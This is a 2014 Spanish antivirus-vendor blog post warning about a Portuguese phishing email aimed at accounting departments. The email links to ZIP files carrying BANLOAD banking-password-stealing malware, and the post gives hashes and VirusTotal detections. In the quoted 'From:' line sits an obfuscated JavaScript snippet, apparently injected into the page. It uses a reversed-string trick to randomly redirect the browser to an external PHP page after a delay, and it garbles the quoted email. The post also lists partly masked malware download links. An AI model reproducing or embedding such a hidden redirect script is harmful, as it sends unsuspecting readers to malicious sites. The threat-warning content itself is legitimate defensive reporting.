MAIL MALICIOSO QUE SE RECIBE EN LOS DEPARTAMENTOS DE CONTABILIDAD

Publicado el 12 febrero 2014 ¬ 15:44 pmh.mscComentarios desactivados en MAIL MALICIOSO QUE SE RECIBE EN LOS DEPARTAMENTOS DE CONTABILIDAD

Otro mail malicioso en portugués con destino a los departamentos de contabilidad de los destinatarios, incluye dos links que descargan ficheros ZIP que contienen malware de la familia BANLOAD (DESCARGADOR DE SPY BANKER)
Dicho mail malicioso tiene este contenido:

 

MAIL MALICIOSO:
_______________
From:            “Roberto – RC Engenharia” <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:contabilidad@%3CDOMINIO”>contabilidad@<DOMINIO DESTINATARIO>
Send reply to:   to de Castro
Diretor Finançeiro
Anexo 1: http://xxx.xxx.51.105/Anexo/DOC.zip
Anexo 2: http://xxx.xxx.51.105/Anexo/Planilha.zip

 

_____________________

FIN DE MAIL MALICIOSO

 

Recibido en mail en portugués, ofrece links de descarga de servidor de Canada:

xxx.xxx.51.105 CA Halifax Regional Municipality,
Nova Scotia,
Canada,
North America B3S 44.6408,
-63.6723 Dynamic ASP

Ambos links llevan empaquetado fichero con igual contenido, que resulta ser una varianted e BANLOAD, la cual genera un cazapassword bancario, “Spy Banker”
A partir del ELISTARA 29.35 de hoy pasamos a controlar tanto el CPL que contiene el ZIP como el EXE final que genera éste.

El preanalisis de dicho fichero final, subido a virustotal, ofrece este informe:

 

MD5 f428e5558ce101f27af5402edbc44b9b
SHA1 92e931c91ebf63e56ff9aebb17684d6f61f16a63
Tamaño del fichero 7.0 MB ( 7293952 bytes )
SHA256: 9f8dead9cb26582d5adf19f70badbc6a03b53c43bf35d71aa0fc7b60a9009887
Nombre: Samihutez755.exe
Detecciones: 11 / 48
Fecha de análisis: 2014-02-12 14:34:02 UTC ( hace 3 minutos )

0 1
Antivirus  Resultado  Actualización
Ad-Aware  Gen:Variant.Strictor.51147  20140212
Avast  Win32:Malware-gen  20140212
BitDefender  Gen:Variant.Strictor.51147  20140212
Comodo  TrojWare.Win32.Spy.Banker.Gen  20140212
Emsisoft  Gen:Variant.Strictor.51147 (B)  20140212
F-Secure  Gen:Variant.Strictor.51147  20140212
GData  Gen:Variant.Strictor.51147  20140212
Ikarus  Win32.SuspectCrc  20140212
MicroWorld-eScan  Gen:Variant.Strictor.51147  20140212
TotalDefense  Win32/FakeIE_i  20140212
VBA32  TScope.Trojan.Delf  20140212
Dicha version del ELISTARA 29.35 que los detecta y elimina,e stará disponible en nuestra web a partir de las 19 h CEST de hoy

saludos

ms, 13-2-20143

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Virus, , , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies